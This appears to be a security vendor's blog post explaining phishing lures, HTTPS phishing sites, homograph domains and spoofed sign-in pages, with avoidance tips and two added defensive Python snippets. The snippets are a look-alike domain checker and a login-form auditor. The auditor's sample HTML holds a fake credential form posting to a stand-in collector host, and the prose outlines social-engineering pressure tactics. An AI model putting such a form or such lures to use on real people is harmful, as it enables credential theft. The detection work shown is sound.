While malware attacks and big data breaches often command the media headlines, phishing scams are both more common and in many cases just as serious a threat to companies. Aside from being used to steal credit card details, login credentials, social security numbers and other personal information, phishing scams are also widely used as an entry point for malware and ransomware attacks. Phishing can result not only in identity theft but also in loss of customer data and company intellectual property. When adversaries engage in spear-phishing, targeted attacks on company personnel, or impersonate enterprise platforms like Software as a Service (SaaS), the risk is even greater. In the last 12 months, 69% of organizations that have suffered a ransomware attack said that the attacker gained access to their network by phishing via email or social media.
The most recent report tracking trends in phishing activity published this week showed that phishing campaigns targeting brands have been steadily increasing over the last quarter:
The report notes that phishing scams are increasingly hosted on HTTPS websites, with nearly half of all phishing sites now using the secure protocol. These will not trigger warnings from mechanisms like Chrome’s “Not secure” label, and their content is invisible to legacy AV solutions that cannot inspect encrypted traffic.
HTTPS is attractive to scammers because users are encouraged to think the much-vaunted green lock in the browser address bar indicates a safe or legitimate site. The truth is that any site, no matter how dangerous, can acquire an SSL certificate. They are even offered for free by services like Comodo and Let’s Encrypt. An SSL certificate only encrypts the connection to whatever site the user has landed on. It offers no guarantee that the site is not malicious.
Phishing for Profit
For any cyberattack, a phishing campaign is a great way to start. Let’s see why it is a favored vector among bad actors.
As the old adage goes, the weakest link in any computer defence strategy is often between the keyboard and the chair; in other words, exploiting human psychology is often easier than exploiting technical systems. Even those who know how to tell a genuine link from a malicious one are not immune to falling victim to a well-crafted phishing campaign.
Using social engineering techniques, persistence and some good initial reconnaissance, phishing is a reasonably reliable way for an attacker to gain an entry point. The scammers have psychology and technology on their side. Add to that some kind of time pressure, such as limited seasonal deals like “Black Friday” or “Cyber Monday” or the unexpected news from a fake legal outfit that your spouse is filing for divorce, and the odds of getting the victim to click a link are statistically in favor of the attacker.
The trick, particularly in targeted spear-phishing campaigns, is to learn enough about the target to know what will “push her buttons” and to use that information in a carefully-crafted impersonation of a trusted source.
Low Risk, High Return
A second reason why phishing is popular with attackers is that it’s a low risk, high return strategy. While phishing may be used by a threat actor to achieve direct entry into a target, the technique is more commonly used by actors with no intention other than to steal credentials and sell them on the Dark Net, using bitcoin and other cryptocurrencies to easily receive untraceable payments. As many people re-use the same login credentials across multiple sites, phishing can have unexpected rewards for those involved in profiteering by selling sensitive information online, where a single sign-on credential could potentially open up a vast treasure-trove of data and access points.
It is notoriously difficult to verify identities through written communication. If a friend makes a video or telephone call, you can instantly recognize that it is your friend on the other end of the line. If you receive a text-based message from your friend urging you to check out a link or open a document, things are much more difficult. In a busy world, it’s a statistical inevitability that some of us will click on something malicious inadvertently. Scammers know this and, like any kind of advertising, getting “click throughs” is all a question of knowing your audience and putting out enough volume.
It Started With a Link
So how do phishing scams work? Email is the primary, but not only, vector. Text messages and social media sites like Facebook, Twitter and LinkedIn have also been exploited, but the aim is always the same: to get the victim to click on a link, make a phone call, or initiate some other kind of action that will trigger the scam.
Many phishing scams will attempt to impersonate a vendor the victim is familiar with, like this fake Spotify subscription message:
Messages like this push just the right psychological buttons. The recipient will be both angry about the “mistake” and concerned not to be charged, so there is a strong incentive to click the baited “review your subscription” link.
Links themselves are often manipulated so that they look legitimate to casual observation. Only one of these is real, but how many users would know which one without pausing for thought?
Then there are homograph attacks, in which scammers register sites with Unicode characters that are visually similar to the ASCII characters used in the name of a genuine site. Compare these two Unicode strings:
and their visual “printed” form, shown on the right in the image below:
These two encodings may look similar to the human eye, but the computer reads them differently. If the first were used in a domain name registration, it would actually point to a completely different site than the second.
Fortunately, most modern browsers can recognise this kind of attack, but there were vulnerabilities in Chrome, Firefox and Opera as recently as last year which were able to bypass those browsers’ homograph protection filters.
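As an added example (not code from the original post), the following Python check renders a hostname the way the resolver sees it, via IDNA/punycode, and flags look-alike labels. The confusables table and the protected brand list are small, constructed stand-ins for the full Unicode confusables data and an organisation’s own allow-list; the check also covers the whole-script case, where every character is Cyrillic, which a mixed-script test alone misses.

```python
import unicodedata

# Constructed subset of the Unicode confusables table:
# look-alike character -> ASCII skeleton. Load the full table in production.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0443": "y", "\u0445": "x", "\u04cf": "l",
    "\u0456": "i", "\u0455": "s", "\u03bf": "o", "\u03b1": "a",
}
# Assumed allow-list of brand domains a defender wants to protect.
PROTECTED = {"apple.com", "cisco.com", "paypal.com"}

def to_punycode(hostname: str) -> str:
    """Return the ASCII (xn--) form that DNS actually resolves."""
    return hostname.encode("idna").decode("ascii")

def skeleton(label: str) -> str:
    """Map each character to its ASCII look-alike, then NFKC-normalise."""
    mapped = "".join(CONFUSABLES.get(c, c) for c in label)
    return unicodedata.normalize("NFKC", mapped).lower()

def scripts(label: str) -> set:
    """Approximate the script of each character from its Unicode name."""
    found = set()
    for c in label:
        if c.isascii():
            found.add("LATIN")
        else:
            found.add(unicodedata.name(c, "UNKNOWN").split()[0])
    return found

def check_hostname(hostname: str) -> dict:
    """Report the punycode form plus every reason a defender should flag it."""
    host = hostname.lower()
    reasons = []
    puny = to_punycode(host)
    if puny != host:                      # at least one non-ASCII label
        reasons.append("non-ascii")
    labels = host.split(".")
    for lab in labels:
        if len(scripts(lab)) > 1:         # Latin mixed with Cyrillic, Greek, ...
            reasons.append(f"mixed-script:{lab}")
    skel = ".".join(skeleton(lab) for lab in labels)
    if skel in PROTECTED and skel != host:  # looks like a brand, but is not
        reasons.append(f"confusable-with:{skel}")
    return {"input": host, "punycode": puny, "skeleton": skel, "reasons": reasons}
```

Running this on a Cyrillic-a “аpple.com” yields the punycode form xn--pple-43d.com plus both the mixed-script and confusable findings, while an all-Cyrillic look-alike is caught only by the skeleton comparison.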
In a more recent attack, scammers used a real subdomain of Google.com, sites.google.com, to host webpages that then redirected victims to malicious sites.
Reeling in the Catch
Once the victim has been hooked, the scam could involve any number of ruses, from fraudulent tech support scams to fake email sign-in pages. A common tactic is to tell the victim that they need to update their email account and then provide a reasonably convincing spoof site:
Examination of the code behind the site, however, will show it for what it is: an attempt to steal the user’s login credentials. After the user enters their credentials in the fake site, the code then redirects them to the real site.
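As an added example (not from the original post), this Python audit automates the “examination of the code behind the site” described above: it parses a page’s forms and flags any form that collects a password but posts it to a host other than the page’s own, or over plain HTTP. The page URL, host names and HTML sample are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class _FormCollector(HTMLParser):
    """Record each <form>'s resolved action URL and whether it takes a password."""
    def __init__(self, page_url: str):
        super().__init__()
        self.page_url = page_url
        self.page_host = urlparse(page_url).hostname
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # Relative actions resolve against the page; absolute ones stand alone.
            action = urljoin(self.page_url, a.get("action") or "")
            self._current = {"action": action, "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def audit_login_page(page_url: str, html: str) -> list:
    """Return one finding per credential form whose destination looks wrong."""
    collector = _FormCollector(page_url)
    collector.feed(html)
    findings = []
    for form in collector.forms:
        if not form["password"]:
            continue                       # search boxes etc. are not of interest
        dest = urlparse(form["action"])
        if dest.hostname != collector.page_host:
            findings.append(f"password form posts off-site to {dest.hostname}")
        if dest.scheme != "https":
            findings.append(f"password form posts over {dest.scheme}")
    return findings

# Constructed sample resembling a spoofed webmail sign-in page; hosts are fictional.
SAMPLE_HTML = """
<form method="post" action="http://collector.example/grab.php">
  <input name="user"><input type="password" name="pass">
  <input type="submit" value="Update account">
</form>
<form action="/search"><input name="q"></form>
"""
```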
Spear-phishing campaigns that target the enterprise may be looking for intellectual property for either industrial or nation-state espionage. A UK engineering company, for example, was recently targeted in a spear-phishing campaign designed to steal secrets about its maritime technology, possibly for a Chinese-backed APT group.
How to Avoid A Scam
Given the dangers, what can a busy person do to reduce the risk of falling for a phishing scam? Here’s some tips:
Ensure that your browsers’ anti-phishing preferences are turned on. It’s not uncommon for users to uncheck this option, and it’s trivial for malware to disable it without user permission.
Depending on your browser, the setting can be found in various places and with various names. For Chrome and Chromium browsers, they are typically under Advanced or Privacy and will be called something like “Safe Browsing” or “Phishing and Malware Protection”.
Firefox calls the setting “Block dangerous and deceptive content”, which is located in its Preferences page under “Privacy & Security”. For Safari, check the “Warn when visiting a fraudulent website” option in its Preferences’ Security tab.
In your email client, disable automatic loading of images and external content stored on remote servers. Failing to do this allows attackers to use clickable images, which can avoid security filters, instead of text for links. It also allows them to include hidden images to notify them when a target opens the poisoned email.
Take a Closer Look
Poor spelling and grammar in emails and other messages are always a red flag, so get into the habit of looking closely at the text of emails that contain links. Hover over any links before clicking them to see where they really lead.
It’s also a good idea to develop the habit of never clicking a link from an email. Avoid clicking links or dialing telephone numbers that request personal information, credit card numbers, or account passwords. Instead, go to the page from a bookmark in your browser, or look up the address in an internet search engine. Similarly, always double-check any phone number you’re asked to call either through a web search or looking at your previous correspondence.
Get with the Program
For enterprise users, consider employee training that simulates phishing campaigns on a regular basis. Use a good Next-Gen AV like SentinelOne that can inspect encrypted traffic and enforce firewall control to block known scam sites.
Be a Good Citizen
And of course, if you spot a phishing attack, be sure to report it. You can report phishing, identity theft and other scams online to the Federal Trade Commission (FTC), as well as inform the organization concerned if the scam is spoofing a legitimate site. Reporting functions are provided by Apple, Google, Microsoft and most other major vendors. You can easily find the appropriate page of other vendors with an internet search for “report phishing to” and the vendor name.